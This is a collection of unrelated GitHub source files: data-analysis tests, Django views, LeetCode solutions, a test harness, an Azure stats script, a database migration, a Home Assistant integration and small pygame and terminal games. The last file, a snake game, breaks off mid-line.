+{"seq_id":"23764205704","text":"import os\r\nimport pytest\r\nimport pandas as pd\r\nimport vaex\r\nfrom datetime import datetime\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport warnings\r\nimport gc\r\nimport psutil\r\n\r\nclass Test:\r\n def test_directorio(self):\r\n print('Directorio: ', os.listdir())\r\n assert True\r\n \r\n def test_rfm_vaex(self):\r\n print('test_rfm_vaex')\r\n gc.collect()\r\n print('\\nRAM ocupada ANTES del test: ')\r\n print(psutil.virtual_memory().percent)\r\n print('%') \r\n\r\n df=vaex.from_csv('work/RFM/2019-Oct-Nov-transformed.csv', parse_dates=['event_time'])\r\n df['event_time'] = df[('event_time')].astype(\"datetime64[D]\")\r\n\r\n #RECENCY\r\n window= np.datetime64('2019-12-01')\r\n window = window.astype(\"datetime64[D]\")\r\n df_recency = df.groupby(by=['user_id'], agg=({'event_time': 'max'}))\r\n df_recency['event_time'] = df_recency['event_time'].values.astype(\"datetime64[D]\")\r\n df_recency['Recency'] = (df_recency['event_time'] - window) * (-1)\r\n df_recency = df_recency[['user_id','Recency']]\r\n df_recency['Recency'] = df_recency[('Recency')].values.astype(\"int\")\r\n\r\n #FREQUENCY\r\n df_frequency = df.groupby(by=['user_id'], agg='count')\r\n df_frequency.rename('count','Frequency')\r\n\r\n #MONETARY\r\n df_monetary = df.groupby(by=['user_id'], agg=({'price': 'sum'}))\r\n df_monetary.rename('price','Monetary')\r\n\r\n #MERGE DE LOS TRES DF\r\n df_rfm = df_recency.join(df_frequency, \r\n how='inner', \r\n left_on ='user_id',\r\n right_on='user_id')\r\n\r\n df_rfm = df_rfm.join(df_monetary, \r\n how='inner', \r\n left_on ='user_id',\r\n right_on='user_id')\r\n\r\n #ELIMINAMOS OUTLIERS UTILIZANDO EL PERCENTIL 98\r\n #Chequeamos máximos y mínimos en Recency (no puede ser menor a 1 ni mayor a 61)\r\n print(df_rfm['Recency'].min())\r\n print(df_rfm['Recency'].max())\r\n #Chequeamos máximos y mínimos en Frequency\r\n print(df_rfm['Frequency'].min())\r\n print(df_rfm['Frequency'].max())\r\n #Chequeamos máximos y mínimos en Monetary\r\n print(df_rfm['Monetary'].min())\r\n print(df_rfm['Monetary'].max())\r\n\r\n #Para Frequency, calculamos el percentil 98 (q98) y nos quedamos con los valores menores a él.\r\n p98 = df_rfm.percentile_approx('Frequency', 98)\r\n print('Percentil 98: ' + str(p98))\r\n df_rfm = df_rfm[df_rfm.Frequency <= p98]\r\n\r\n #Para Monetary, calculamos el percentil 2 y el percentil 98 (p2 y p98) y nos quedamos con el intervalo entre estos dos valores.\r\n p2 = df_rfm.percentile_approx('Monetary', 2)\r\n p98 = df_rfm.percentile_approx('Monetary', 98)\r\n print('Percentil 2: ' + str(p2))\r\n print('Percentil 98: ' + str(p98))\r\n df_rfm = df_rfm[df_rfm.Monetary > p2]\r\n df_rfm = df_rfm[df_rfm.Monetary < p98]\r\n\r\n #ASIGNAMOS QUINTILES\r\n rfm = pd.DataFrame(df_rfm, columns=['user_id','Recency','Frequency','Monetary'])\r\n rfm = rfm.astype({'user_id':'int','Recency':'int','Frequency':'int'})\r\n\r\n R_condition = [(rfm['Recency'] < 11),\r\n ((rfm['Recency'] >= 11) & (rfm['Recency'] < 15)),\r\n ((rfm['Recency'] >= 15) & (rfm['Recency'] < 28)),\r\n ((rfm['Recency'] >= 28) & (rfm['Recency'] < 44)),\r\n (rfm['Recency'] >= 44)]\r\n\r\n option = [5,4,3,2,1]\r\n rfm['R'] = np.select(R_condition, option,default=5)\r\n condition = [(rfm.Frequency == 1) | (rfm.Frequency == 2),\r\n (rfm.Frequency == 3) | (rfm.Frequency == 4),\r\n (rfm.Frequency == 5) | (rfm.Frequency == 6),\r\n (rfm.Frequency == 7) | (rfm.Frequency == 8)]\r\n option = [1,2,3,4]\r\n rfm['F'] = np.select(condition, option, default= 5)\r\n\r\n rfm['M'] = pd.qcut(rfm['Monetary'], q=5, labels=[1,2,3,4,5]) \r\n rfm['M']=rfm['M'].astype(int)\r\n rfm = vaex.from_pandas(rfm)\r\n rfm[\"RFM_SCORE\"] = (rfm['R'].astype(str) + \r\n rfm['F'].astype(str) +\r\n rfm['M'].astype(str))\r\n\r\n #A PARTIR DEL RFM_SCORE, MAPEAMOS LOS SEGMENTOS\r\n seg_map = vaex.read_csv('work/RFM/segmentos_rfm.csv', usecols=['RFM_SCORE','segment'])\r\n seg_map['RFM_SCORE']= seg_map.RFM_SCORE.astype(str)\r\n\r\n rfm = rfm.join(seg_map, \r\n how='inner', \r\n left_on ='RFM_SCORE',\r\n right_on='RFM_SCORE')\r\n\r\n\r\n rfm.export_csv('work/RFM/RFM VAEX Resultados.csv')\r\n\r\n print('\\nRAM ocupada DESPUÉS del test: ')\r\n print(psutil.virtual_memory().percent) \r\n print('%\\n') \r\n\r\n \r\n \r\n assert True\r\n","repo_name":"MelRubino98/RFM","sub_path":"test_rfm_vaex.py","file_name":"test_rfm_vaex.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1436804962","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import TagForm, NoteForm\nfrom .models import Tag, Note\n\n\n@login_required(login_url='/login/')\ndef main(request):\n notes = Note.objects.all().filter(owner=request.user)\n tags = Tag.objects.all().filter(owner=request.user)\n if request.method == \"POST\":\n question = request.POST.get(\"question\")\n if not question.strip() == '':\n by_tags = list()\n by_desc = list()\n by_name = list()\n for each in notes:\n note_tags = list()\n for tag in each.tags.all():\n note_tags.append(tag.name)\n if question in each.description:\n by_desc.append(each)\n if question in note_tags:\n by_tags.append(each)\n if question in each.name:\n by_name.append(each)\n if len(by_name) > 0 or len(by_tags) > 0 or len(by_desc) > 0:\n by_tags.insert(0, \"BLANKTAG\")\n return render(request, 'notes/index.html', {\"by_tags\": by_tags, \"by_desc\": by_desc, \"by_name\": by_name})\n return render(request, 'notes/index.html', {\"notes\": notes, \"tags\": tags})\n\n\n@login_required(login_url='/login/')\ndef tag(request):\n if request.method == 'POST':\n names = request.POST.get(\"name\").split(\",\")\n request.POST = request.POST.copy()\n for each in names:\n each.strip()\n if not each.startswith(\"#\"):\n each = \"#\" + each.strip()\n request.POST.update({\"name\": each})\n form = TagForm({\"owner\": request.user, \"name\": request.POST.get('name')})\n if form.is_valid():\n form.save()\n return redirect(to='notes:main')\n\n return render(request, 'notes/tag.html', {'form': TagForm()})\n\n\n@login_required(login_url='/login/')\ndef note(request):\n tags = Tag.objects.all().filter(owner=request.user)\n try:\n form = NoteForm(\n {\"name\": request.POST.get('name'), \"description\": request.POST.get(\"description\"), \"owner\": request.user})\n if form.is_valid():\n new_note = form.save()\n\n choice_tags = Tag.objects.filter(name__in=request.POST.getlist('tags'))\n for tag in choice_tags.iterator():\n new_note.tags.add(tag)\n\n return redirect(to='notes:main')\n else:\n return render(request, 'notes/note.html', {\"tags\": tags, 'form': form})\n except:\n return render(request, 'notes/note.html', {\"tags\": tags, 'form': NoteForm()})\n\n\n@login_required(login_url='/login/')\ndef delete_note(request, note_id):\n Note.objects.get(pk=note_id, owner=request.user).delete()\n return redirect(to='notes:main')\n\n\n@login_required(login_url='/login/')\ndef edit(request, note_id):\n tags = Tag.objects.all().filter(owner=request.user)\n note = get_object_or_404(Note, pk=note_id, owner=request.user)\n if note:\n return render(request, 'notes/edit.html', {\"note\": note, \"tags\": tags})\n else:\n return redirect(to=\"notes:main\")\n\n\n@login_required(login_url='/login/')\ndef alteration(request, note_id):\n note = get_object_or_404(Note, pk=note_id, owner=request.user)\n note.description = request.POST.get('description')\n note.name = request.POST.get('name')\n note.save()\n\n for each in note.tags.all():\n note.tags.remove(each)\n for each in request.POST.getlist('tags'):\n tag = get_object_or_404(Tag, name=each)\n note.tags.add(tag)\n return redirect(\"notes:edit\", note_id=note_id)\n\n\n@login_required(login_url='/login/')\ndef tag_delete(request):\n for each in request.POST.getlist('tag_delete'):\n tag = get_object_or_404(Tag, name=each, owner=request.user)\n tag.delete()\n return redirect(to=\"notes:main\")","repo_name":"DioSWolF/web_command_project","sub_path":"personal_assistant/notes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21573975415","text":"__author__ = \"vcancy\"\n\n\n# /usr/bin/python\n# -*-coding:utf-8-*-\n\n\"\"\"\n\n分析:数组为有序的,只需要遍历一次,前后值不相同的移出数组\n\n定义一个临时变量保存最近一次的值,返回最后数组的大小即可\n\n\"\"\"\n\nclass Solution:\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n temp = nums[0]\n index = 1\n n = len(nums)\n while index < n:\n if nums[index] == temp:\n nums.pop(index)\n n -= 1\n else:\n temp = nums[index]\n index += 1\n return index\n","repo_name":"vcancy/python-algorithm","sub_path":"leetcode/Algorithms/Array/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72944858962","text":"from subprocess import call\nfrom random import randint\n\nTESTS = int(input(\"TESTS = \"))\nMAXN = int(input(\"MAXN = \"))\nMAXM = int(input(\"MAXM = \"))\nMAXK = int(input(\"MAXK = \"))\n\nfor test in range(1, TESTS + 1):\n N, M, K = None, None, None\n if test < TESTS:\n N = randint(1, MAXN)\n M = randint(1, MAXM)\n K = randint(1, MAXK)\n else:\n N, M, K = MAXN, MAXM, MAXK\n\n if call(\"./generator \" + str(N) + \" \" + str(M) + \" \" + str(K) + \" > ninja.in\", shell=True) != 0:\n print(\"Generator crashed on test\", test)\n break\n\n if call(\"./main\", shell=True) != 0:\n print(\"Main source crashed on test\", test)\n break\n\n MAIN = [int(line.strip()) for line in open(\"ninja.out\")]\n\n if call(\"./brut\", shell=True) != 0:\n print(\"Brute-force source crashed on test\", test)\n break\n\n BRUT = [int(line.strip()) for line in open(\"ninja.out\")]\n\n if MAIN != BRUT:\n print(\"Different output on test\", test)\n break\n\n print(\"Case #\", test, \": OK\", sep=\"\")\n","repo_name":"adrian-budau/work","sub_path":"infoarena/ninja/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"30152035797","text":"# https://github.com/vntechies/toolbox\n#\n# License: MIT\n#\n# This script get an index's statistics from Azure search service using Azure API\n\nimport json\n\nimport requests\n\n# These should be configured via pipeline variables or runtime env\nINDEX_NAME = \"\"\nAPI_VERSION = \"\"\nSEARCH_SERVICE_NAME = \"\"\nSEARCH_API_KEY = \"\"\n\n\ndef main():\n try:\n print(\"Getting statistics for indexes via AzureAPI\")\n\n url = \"https://%s.search.windows.net/indexes/%s/stats?api-version=%s\" % (\n SEARCH_SERVICE_NAME,\n INDEX_NAME,\n API_VERSION,\n )\n payload = {}\n headers = {\n \"Content-Type\": \"application/json\",\n \"api-key\": SEARCH_API_KEY,\n }\n\n print(\n \"Getting statistics of %s index on %s service\"\n % (INDEX_NAME, SEARCH_SERVICE_NAME)\n )\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n documentCount = json.loads(response.text)[\"documentCount\"]\n storageSize = json.loads(response.text)[\"storageSize\"]\n message = (\n \"Statistics of %s index on %s service: Document count: %s, Storage Size: %s\"\n % (INDEX_NAME, SEARCH_SERVICE_NAME, documentCount, storageSize)\n )\n print(message)\n elif response.status_code == 404:\n message = \"There is no %s index on %s service\" % (\n INDEX_NAME,\n SEARCH_SERVICE_NAME,\n )\n print(message)\n else:\n raise requests.ConnectionError(\n \"Expected status code 200, but got %d, with response: %s\"\n % (response.status_code, response.text)\n )\n except Exception as ex:\n error = \"Exception on getting statistics of %s index on %s service: %s\" % (\n INDEX_NAME,\n SEARCH_SERVICE_NAME,\n ex,\n )\n print(error)\n raise ex from None\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vntechies/toolbox","sub_path":"azure/search_service/get_index.py","file_name":"get_index.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
+{"seq_id":"41028650075","text":"import os\nfrom pathlib import Path\n\nimport openpnm as op\n\n\nclass MARockTest:\n\n def setup_class(self):\n ws = op.Workspace()\n ws.clear()\n\n def teardown_class(self):\n ws = op.Workspace()\n ws.clear()\n\n def test_load_MARock(self):\n path = Path(os.path.realpath(__file__),\n '../../../fixtures/3DMA-Castlegate')\n net = op.io.network_from_marock(filename=path)\n assert hasattr(net, 'conns')\n assert net.Np == 9915\n assert net.Nt == 21805\n a = {'pore.ID_number', 'pore.boundary_type', 'pore.coordination',\n 'pore.coords', 'pore.volume', 'throat.conns',\n 'throat.coords', 'throat.cross_sectional_area'}\n assert a.issubset(net.props())\n\n\nif __name__ == '__main__':\n import py\n\n # All the tests in this file can be run with 'playing' this file\n t = MARockTest()\n self = t # For interacting with the tests at the command line\n t.setup_class()\n for item in t.__dir__():\n if item.startswith('test'):\n print(f\"Running test: {item}\")\n t.__getattribute__(item)()\n","repo_name":"PMEAL/OpenPNM","sub_path":"tests/unit/io/MARockTest.py","file_name":"MARockTest.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"3"}
+{"seq_id":"73997374481","text":"class Solution:\n def maxSatisfaction(self, satisfaction: List[int]) -> int: \n \n max_sat = 0\n satisfaction.sort(reverse=True)\n\n cur_sat = 0\n cum_sum = 0\n\n for each_dish in satisfaction:\n\n cum_sum += each_dish\n cur_sat += cum_sum\n max_sat = max(max_sat, cur_sat)\n\n return max_sat\n","repo_name":"KajalGada/leetcode-python","sub_path":"Reducing Dishes/sol3.py","file_name":"sol3.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34519167490","text":"\"\"\"\nDay 7 6/29/2021\nProblem: https://leetcode.com/problems/max-consecutive-ones-iii/\n\nGiven a binary array nums and an integer k, return the maximum number of consecutive 1's in the\narray if you can flip at most k 0's.\n \"\"\"\n\n\nclass Solution:\n def longestOnes(self, nums: list[int], k: int) -> int:\n max_count = 0\n a = 0\n b = 0\n\n for num in nums:\n b += 1\n if num == 0:\n k -= 1\n while k < 0:\n if nums[a] == 0:\n k += 1\n a += 1\n\n max_count = max(max_count, b - a)\n return max_count\n\n def longestOnes_2(self, nums: list[int], k: int) -> int:\n start = 0\n for end in range(len(nums)):\n k -= (1 - nums[end])\n if k < 0:\n k += (1 - nums[start])\n start = start + 1\n print(f'k: {k}, start: {start}, end: {end}')\n return end - start + 1\n\n\nif __name__ == \"__main__\":\n test = Solution()\n nums = [1,0,1,1,0,0,0,1,1,1,1,0,0,1,1]\n k = 2\n print(test.longestOnes(nums, k))\n print(test.longestOnes_2(nums, k))","repo_name":"Lazy-Beee/PythonLearning2021","sub_path":"04 LeetCode-practice/6-2021/6-29-2021 P.1004 Max Consecutive Ones III/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22264353156","text":"import os\nimport shutil\n\n#-------------------------------------------Delete a particular file along with its parent folder----------------------------------\n#Use os.path.basename() to extract the file name from the path string\n#To extract the file name without the extension, use os.path.splitext()\n#Use os.path.dirname() to extract the directory name (folder name) from the path string.As shown below\n#Use os.path.split() to get both the file and directory (folder) name. os.path.split() returns a tuple of file name returned by os.path.basename() and directory name returned by os.path.dirname().\n#Use os.path.splitext() to get the extension. os.path.splitext() splits the extension and others (root) and returns it as a tuple. The extension contains the dot \n#To create a path string with only the extension changed from the original, concatenate the first element of the tuple returned by os.path.splitext() with any extension.\n\ndef search_files(file_name, search_path):\n output = []\n# Walking top-down from the root\n for root, dir, files in os.walk(search_path):\n if file_name in files:\n output.append(os.path.join(root, file_name))\n return output\n\ndef delete_file_folder(file_name, search_path):\n str=\"\"\n result = search_files(file_name, search_path)\n for element in result: \n str += element \n print(\"Location of file \" + file_name + \"is\" + str)\n dirname = os.path.dirname(str)\n print (\"Directory path \" + dirname)\n if os.path.exists(str):\n shutil.rmtree(dirname)\n # os.remove(str)\n return str + \" Deleted Successfully along wit parent folder \" + os.path.basename(dirname)\n else:\n return file_name + \" The file does not exist\"\n\n#print(search_files())\nprint(delete_file_folder(\"test3.txt\",'C:/Users/CBNITS'))\n","repo_name":"1998-surbhi/Automation_Testing_3","sub_path":"sub/delete_file.py","file_name":"delete_file.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72655075280","text":"import socket\n\ndef cidr(address):\n try:\n x = socket.inet_aton(address)\n except:\n raise ValueError(\"%s is not a valid ip address\" % address)\n x = (ord(x[0])<<24) + (ord(x[1])<<16) + (ord(x[2])<<8) + ord(x[3])\n return x\n\ndef in_cidr(address, net):\n \"\"\"\n Takes two strings, the first an IP address, the second a network in\n CIDR format\n Returns True if the adress is in the network\n\n Example:\n >>> in_cidr('10.0.0.7', '10.0.0.0/29')\n True\n >>> in_cidr('10.0.0.8', '10.0.0.0/29')\n False\n >>> in_cidr('127.0.0.1', '127.0.0.1')\n True\n \"\"\"\n\n mask = 0xFFFFFFFF\n components = net.split(\"/\")\n if len(components) > 1:\n mask = ~(0xFFFFFFFF >> int(components[1]))\n\n x = cidr(address)\n y = cidr(components[0])\n\n return (x & mask) == y\n\n#if __name__ == '__main__':\n# print in_cidr('10.0.0.7', '10.0.0.0/29')\n# print in_cidr('10.0.0.8', '10.0.0.0/29')\n# print in_cidr('127.0.0.1', '127.0.0.1')\n# print in_cidr('10.0.0.20', '10.0.0.0/24')\n","repo_name":"jbeyers/Products.PASIPAuth","sub_path":"Products/PASIPAuth/cidr.py","file_name":"cidr.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22178612096","text":"\"\"\"Add Department.max_consecutive_hours\n\nRevision ID: 82e95f305078\nRevises: da22d6a6407c\nCreate Date: 2018-11-30 16:10:08.348278\n\n\"\"\"\n\n\n# revision identifiers, used by Alembic.\nrevision = '82e95f305078'\ndown_revision = 'da22d6a6407c'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n\ntry:\n is_sqlite = op.get_context().dialect.name == 'sqlite'\nexcept:\n is_sqlite = False\n\nif is_sqlite:\n op.get_context().connection.execute('PRAGMA foreign_keys=ON;')\n utcnow_server_default = \"(datetime('now', 'utc'))\"\nelse:\n utcnow_server_default = \"timezone('utc', current_timestamp)\"\n\ndef sqlite_column_reflect_listener(inspector, table, column_info):\n \"\"\"Adds parenthesis around SQLite datetime defaults for utcnow.\"\"\"\n if column_info['default'] == \"datetime('now', 'utc')\":\n column_info['default'] = utcnow_server_default\n\nsqlite_reflect_kwargs = {\n 'listeners': [('column_reflect', sqlite_column_reflect_listener)]\n}\n\n# ===========================================================================\n# HOWTO: Handle alter statements in SQLite\n#\n# def upgrade():\n# if is_sqlite:\n# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:\n# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)\n# else:\n# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)\n#\n# ===========================================================================\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('department', sa.Column('max_consecutive_hours', sa.Integer(), server_default='0', nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('department', 'max_consecutive_hours')\n # ### end Alembic commands ###\n","repo_name":"magfest/ubersystem","sub_path":"alembic/versions/82e95f305078_add_department_max_consecutive_hours.py","file_name":"82e95f305078_add_department_max_consecutive_hours.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"}
+{"seq_id":"31776120606","text":"\"\"\"Inverse support for switch entities.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN, SwitchEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_ENTITY_ID\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import entity_registry as er\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\n\nfrom .entity import BaseToggleEntity\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Initialize Inverse Switch config entry.\"\"\"\n registry = er.async_get(hass)\n entity_id = er.async_validate_entity_id(\n registry, config_entry.options[CONF_ENTITY_ID]\n )\n\n async_add_entities(\n [\n InvertSwitch(\n hass,\n config_entry.title,\n SWITCH_DOMAIN,\n entity_id,\n config_entry.entry_id,\n )\n ]\n )\n\n\nclass InvertSwitch(BaseToggleEntity, SwitchEntity):\n \"\"\"Represents a Switch as Inversed.\"\"\"\n\n @property\n def is_on(self) -> bool | None:\n \"\"\"Return true if the entity is off.\"\"\"\n return not self._attr_is_on\n\n async def async_turn_on(self, **kwargs: Any) -> None:\n \"\"\"Turn off original switch.\"\"\"\n await super().async_turn_off()\n\n async def async_turn_off(self, **kwargs: Any) -> None:\n \"\"\"Turn on original switch.\"\"\"\n await super().async_turn_on()\n","repo_name":"disforw/inverse","sub_path":"custom_components/inverse/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"35065621998","text":"from pygame import *\r\nimport os\r\nimport pyganim\r\nfrom camera import Camera\r\n\r\nPLATFORM_WIDTH = 32\r\nPLATFORM_HEIGHT = 32\r\nPLATFORM_COLOR = \"#FF6262\"\r\nBKGRND_COLOR = \"#004400\"\r\nICON_DIR = os.path.dirname(__file__) # Полный путь к каталогу с файлами\r\n\r\nANIMATION_BLOCKTELEPORT = [\r\n ('%s/blocks/portal2.png' % ICON_DIR, 200),\r\n ('%s/blocks/portal1.png' % ICON_DIR, 200)]\r\n\r\nANIMATION_PRINCESS = [\r\n ('%s/blocks/princess_l.png' % ICON_DIR, 800),\r\n ('%s/blocks/princess_r.png' % ICON_DIR, 800)]\r\n\r\nclass BlockStatic(sprite.Sprite):\r\n def __init__(self, x, y, width, height):\r\n sprite.Sprite.__init__(self)\r\n self.image = Surface((width, height))\r\n self.rect = Rect(x, y, width, height)\r\n def draw(self, screen: Surface, camera: Camera):\r\n screen.blit(self.image, camera.transformSprite(self))\r\n\r\nclass Platform(BlockStatic):\r\n def __init__(self, x, y):\r\n BlockStatic.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT)\r\n self.image = image.load(\"%s/blocks/platform.png\" % ICON_DIR)\r\n\r\nclass BlockDie(BlockStatic):\r\n def __init__(self, x, y):\r\n BlockStatic.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT)\r\n self.image = image.load(\"%s/blocks/dieBlock.png\" % ICON_DIR)\r\n\r\nclass BlockAnimated(BlockStatic):\r\n def __init__(self, x, y, width, height, animation):\r\n BlockStatic.__init__(self, x, y, width, height)\r\n self.boltAnim = pyganim.PygAnimation(animation)\r\n self.boltAnim.play()\r\n\r\n def draw(self, screen: Surface, camera: Camera):\r\n self.image.fill(Color(BKGRND_COLOR))\r\n self.boltAnim.blit(self.image, (0, 0))\r\n BlockStatic.draw(self, screen, camera)\r\n\r\nclass BlockTeleport(BlockAnimated):\r\n def __init__(self, x, y, goX,goY):\r\n BlockAnimated.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT, ANIMATION_BLOCKTELEPORT)\r\n self.goX = goX # координаты назначения перемещения\r\n self.goY = goY # координаты назначения перемещения\r\n\r\nclass Princess(BlockAnimated):\r\n def __init__(self, x, y):\r\n BlockAnimated.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT, ANIMATION_PRINCESS)\r\n","repo_name":"igor-a-yastrebov/Python-First-Game","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71551300560","text":"# -*- coding: utf-8 -*-\n\n'''\n@Author : Corley Tang\n@contact : cutercorleytd@gmail.com\n@Github : https://github.com/corleytd\n@Time : 2023-11-17 22:11\n@Project : Hands-on Crawler with Python-snake_advanced\n贪吃蛇进阶版——食物可动,蛇追食物:\n1.控制的对象是食物,而不是蛇;\n2.蛇可以自动加速;\n3.蛇的身体可以自动变长;\n4.蛇的大体移动方向是食物所在的方向\n'''\n\nimport random\nfrom collections import deque\nfrom copy import copy\n\nfrom blessed import Terminal\n\n# 定义常量\nterm = Terminal() # 终端\n\n# 方向常量\nUP = term.KEY_UP\nDOWN = term.KEY_DOWN\nLEFT = term.KEY_LEFT\nRIGHT = term.KEY_RIGHT\ndirection = RIGHT # 初始默认方向\ndirections = [UP, DOWN, LEFT, RIGHT] # 所有方向\nMOVE_MAP = {LEFT: (0, -1), RIGHT: (0, 1), UP: (-1, 0), DOWN: (1, 0)} # 移动方向与坐标变化的映射\nis_dead = False # 是否死亡\n\n# 图标\nBORDER = '-' # 边界\nHEAD = 'O' # 头部\nBODY = 'o' # 身体\nFOOD = '*' # 食物\nSPACE = ' ' # 空白\n\n# 游戏参数\nWIDTH = 30 # 屏幕宽度\nHEIGHT = 20 # 屏幕高度\nsnake = deque([[6, 5], [6, 4], [6, 3]]) # 贪吃蛇\nfood = [15, 10] # 食物\nscore = 0 # 得分\nspeed = 3 # 游戏速度\nMAX_SPEED = 10 # 最大速度\n# 通过轮数来控制蛇的速度和体长\nSPEED_STEP = 2 # 速度增长间隔\nBODY_STEP = 5 # 身体增长间隔\n\nwith term.cbreak(), term.hidden_cursor(): # 上下文管理器,隐藏光标\n # 清空屏幕\n print(term.home + term.clear)\n\n # 构造世界\n world = [[SPACE for _ in range(WIDTH)] for _ in range(HEIGHT)]\n # 构造边界\n for i in range(WIDTH): # 横线\n world[0][i] = BORDER\n world[-1][i] = BORDER\n for i in range(HEIGHT): # 竖线\n world[i][0] = BORDER\n world[i][-1] = BORDER\n\n # 绘制贪吃蛇\n for i in snake: # 绘制身体\n world[i[0]][i[1]] = BODY\n # 绘制头\n world[snake[0][0]][snake[0][1]] = HEAD\n # 绘制食物\n world[food[0]][food[1]] = FOOD\n\n # 绘制世界\n for row in world:\n print(' '.join(row))\n\n value = '' # 键盘输入\n move = False # 是否移动\n turn = 0 # 游戏轮数\n while value.lower() != 'q': # 不退出\n value = term.inkey(timeout=1 / speed) # 阻塞timeout参数指定的时间,获取键盘输入\n if value.code in directions: # 只有按4个方向键之一,才会移动\n move = True\n if not move: # 输入的不是方向键,则不移动,跳入下一次循环继续输入\n continue\n\n # 1.移动蛇\n head = snake[0] # 蛇头\n y_delta = food[0] - head[0] # 食物与蛇头的Y坐标差\n x_delta = food[1] - head[1] # 食物与蛇头的X坐标差\n move_to = None # 蛇希望移动的方向:食物所在位置的方向,向着坐标差距更大的方向移动\n if abs(y_delta) > abs(x_delta): # 食物与蛇头的Y坐标差大于X坐标差\n if y_delta > 0: # 食物在蛇头的下方\n move_to = DOWN\n else: # 食物在蛇头的上方\n move_to = UP\n else: # 食物与蛇头的Y坐标差小于X坐标差\n if x_delta > 0: # 食物在蛇头的右方\n move_to = RIGHT\n else: # 食物在蛇头的左方\n move_to = LEFT\n\n random.shuffle(directions)\n move_tos = [move_to] + directions # 所有可能的方向,包含随机性\n next_move = None # 下一个移动的方向\n for move_to in move_tos:\n movement = MOVE_MAP.get(move_to)\n head_ = copy(head)\n # 计算新蛇头的位置\n head_[0] += movement[0]\n head_[1] += movement[1]\n # 新蛇头位置的内容\n head_content = world[head_[0]][head_[1]]\n if head_content == BORDER: # 新蛇头位置是边界\n continue\n elif head_content == BODY: # 新蛇头位置是身体\n if head_ == snake[-1] and turn % BODY_STEP != 0: # 新蛇头位置是蛇尾,但蛇身不变长,此时允许,可以进入下一步,否则失败、要退出游戏\n next_move = head_\n break\n else: # 其他情况,要判断下一个方向\n continue\n else: # 其他情况,都允许进入下一步\n next_move = head_\n break\n\n # 所有动作都尝试后,依然无法移动\n if not next_move:\n break # 退出游戏\n\n world[food[0]][food[1]] = SPACE # 蛇移动前,需要清理当前食物的位置\n snake.appendleft(next_move)\n world[head[0]][head[1]] = BODY # 蛇头移动之后,原来的蛇头位置设为身体\n world[next_move[0]][next_move[1]] = HEAD # 蛇头移动之后,蛇头位置设为头部\n if turn % BODY_STEP != 0: # 蛇身不变长\n tail = snake.pop() # 为了保持蛇身不变长,需要将蛇尾弹出\n world[tail[0]][tail[1]] = SPACE # 蛇尾移动之后,原来的蛇尾位置设为空白\n\n if turn % SPEED_STEP == 0: # 速度增长\n speed = min(speed * 1.01, MAX_SPEED)\n\n # 2.移动食物\n food_ = copy(food)\n if value.code in directions:\n direction = value.code\n movement = MOVE_MAP.get(direction)\n # 食物移动的下一个方向\n food_[0] += movement[0]\n food_[1] += movement[1]\n food_content = world[food_[0]][food_[1]]\n\n if food_content == HEAD or food_content == BODY: # 